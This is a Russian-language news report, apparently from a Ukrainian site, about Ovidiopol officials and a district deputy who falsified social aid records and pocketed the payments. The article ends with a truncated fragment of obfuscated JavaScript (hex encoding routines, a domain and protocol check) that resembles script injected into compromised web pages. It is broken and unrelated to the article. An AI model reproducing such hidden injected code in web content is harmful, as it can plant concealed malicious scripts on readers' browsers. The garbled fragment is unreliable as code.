Овидиопольские чиновники присваивали крупные суммы при выплате соцпомощи «фото»

Овидиопольские чиновники присваивали крупные суммы при выплате соцпомощи

 

взяткаКак сообщает корреспондент Украинской Службы Информации со ссылкой на пресс-службу прокуратуры Одесской области, чиновников разоблачили сотрудники прокуратуры и СБУ.

Выяснилось, что депутат районного совета и начальник одного из управлений райгосадминистрации по предварительному сговору со служащими этого управления вносили в автоматизированную систему Министерства социальной политики Украины недостоверные сведения. Кроме того, чиновники вносили в официальные документы данные о получателях помощи, которые не соответствовали действительности.

В дальнейшем депутат Овидиопольского районного совета снимал в банках незаконно начисленную социальную помощь малообеспеченным семьям, распределяя деньги между участниками преступного сговора, а в отдельных случаях с частичной передачей их законным получателям.

Досудебное расследование в уголовном производстве по ч. 5 ст. 191 УК Украины (присвоение, растрата имущества или завладение им путем злоупотребления служебным положением) продолжается.
Как сообщала USIonline.com, депутат Виктор Баранский так и не нашел ответа на вопрос, за какие деньги он содержит свой благотворительный фонд.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e